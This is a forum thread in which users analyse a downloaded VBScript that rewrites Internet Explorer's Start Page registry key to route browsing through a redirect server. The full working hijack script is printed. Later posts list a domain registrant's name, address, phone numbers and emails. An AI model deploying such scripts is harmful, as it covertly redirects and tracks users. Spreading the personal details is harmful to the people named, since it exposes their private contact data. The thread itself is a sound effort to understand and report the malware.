help with non virus thingy

GoneShootin

ok i was browsing net when this happened :

1) download box opens
2) file name : THE-CID
3) so i save it to disk [i know i shouldnt have but its been popping up b4]
4) open file with wordpad, actual filename now is test.vbs [vbs normally = VIRUS]
5) this is what i saw

on error resume next

sub regcreate(regkey,regvalue)
Set regedit = CreateObject("WScript.Shell")
Filter1 = "about:blank"
Filter2 = "file:"
Filter3 = "C:"
Filter4 = "http://www.startyourdayhere.com"
Filter5 = "http://redirect.linksummary.com"
OUD = regedit.RegRead(regkey)
URL = "http://str.realredirect.com/default.asp?a="
if Left(OUD, Len(URL)) <> URL AND Left(OUD, Len(Filter1)) <> Filter1 AND Left(OUD, Len(Filter3)) <> Filter3 AND Left(OUD, Len(Filter2)) <> Filter2 AND Left(OUD, Len(Filter4)) <> Filter4 AND Left(OUD, Len(Filter5)) <> Filter5 then
regedit.RegWrite regkey,regvalue+OUD
end if
end sub


regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://redirect.linksummary.com/redirect.asp?a=&quot;

obviously it changes the startpage of explorer to waterver. i sent an email to the admin of linksummary complaining about it. my question is how is it tagged onto a site and how did it initiate ?

anybody else get this ?

seamus

OK, I've never done VB, but no doubt '.vbs' stands for Visual Basic Script. It looks like it's trying to log a permanent redirect if that page comes up with errors, but not knowing VB I couldn't know. Maybe the website people themselves put it there

kayos

Right so from my quick reading of this script whats happening is as follows.

Step 1:
Something calls this function passing it a regkey and a value for that regkey

regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://redirect.linksummary.com/redirect.asp?a=" 

being what calls it.

Step 2:
The function reads your current value for the rgekey into the var OUD.

Step 3:
It compares the Var OUD to the Var URL. OUD is different to any of the following URL, Filter1, Filter2, Filter3, Filter4 or Filter5 it writes the follow string to your reg

[url]http://redirect.linksummary.com/redirect.asp?a=[/url]<what ever your default home page is>

so fi your hoime page was http://www.boards.ie it would write

[url]http://redirect.linksummary.com/redirect.asp?a=http://www.boards.ie[/url]

What site did this script come from? I'll see whats happening when you post the site up.

kayos

Hobbes

Originally posted by Gone Shootin
obviously it changes the startpage of explorer to waterver.

Actually it's a little nastier then that. It causes your page requests to be routed through thier server so if you were to look at http://www.boards.ie/ instead you would get http://redirect.linksummary.com/redirect.asp?a=http://www.boards.ie/

So everything would be cached on thier server. Not sure if it would grab passwords or whatnot but it would give them a list of pages you access.

Something like this would probably be used to slap an advert or two at you but I just checked the link and it just serves up the page so my guess is they are using it to track and store information on you. *sigh* better change my password =/

That code looks very buggy though.

marauder

that explains the name.....

Records of the Office of War Information
The Central Intelligence Division, among its other functions, was to maintain a central repository of intelligence material and a central repository for all foreign operational information in Washington

GoneShootin

now this i dont understand. i checked my homepage, the one i actually made [and still making]

http://www.mitchelstown.net

checked it today and got the download window with THE-CID.

check it out, but dont open it


i presume im gona have to wipe the server or something, or maybe its coming through the domain service

http://www.namesecure.com

here is the reply to the email i sent to linksummery admin :

"dear mr rea, this sounds very serious, please give us the url that you found this file at" etc....

Hobbes

Registrant:
Ismailova, Elmira (LINKSUMMARY-DOM)
Distelvlinderweg 88
Diemen, - 1113 LB
NL

Domain Name: LINKSUMMARY.COM

Administrative Contact, Technical Contact, Billing Contact:
Ismailova, Elmira (RWHDCPZTCI) elmira@elmira-fashion.com
Distelvlinderweg 88
Diemen, - 1113 LB
NL
+31 6 53216321 +31 20 5241313

That is in Holland btw.

Now either the admin of linksummary is in on it, or thier server is hacked.

Elmira also runs (or part of) realtracker.com which is a homepage usage tracker.

She can also be contacted at a.de.raaf@universal.nl which appears to be an address also used by a "Gert-Jan Strik" who appears among other things to be a VB expert.

Realtracker.com have been known to spam people and newsgroups. Thier sites are clickthough links which give the guy cash when people click the link .

Owners of realtracker.com other contact information...

john@pagetostart.com
beheer@cybercomm.nl
postmaster@pagetostart.nl
postmaster@worldtostart.com
adult_beheer@hotmail.com
arjan@PAGETOSTART.COM (owner)
postmaster@mediahighway.nl (owner)
arjan@realtracker.com (owner)
beheer@pins.nl

I have found more information but from a guess of what I have read so far they are spammers, lord knows what they are up to with that file though.

Trojan

Hey Hobbes, check your PM.

Al.

GoneShootin

and of course i use realtracker for ALL of my sites, god dammit i dont feel like going thru em and deleting em off the pages, specially with some of the sites having LOADSA hits...

thanks hobbes

GoneShootin

update....

this is what i got in my email this morning :

I did check your website and I didn't get what you did get but I do know
that one of our ex-workers did damage a view of our systems after we fired
him, could you please check if you still got the problem subscribed below?

Arjan de Raaf
LinkSummary

now the file is actually gone, which is fine, but i suspect that it was there when he took a look at it and THEN he fixed it....

lol, AFTER WE FIRED HIM, funny....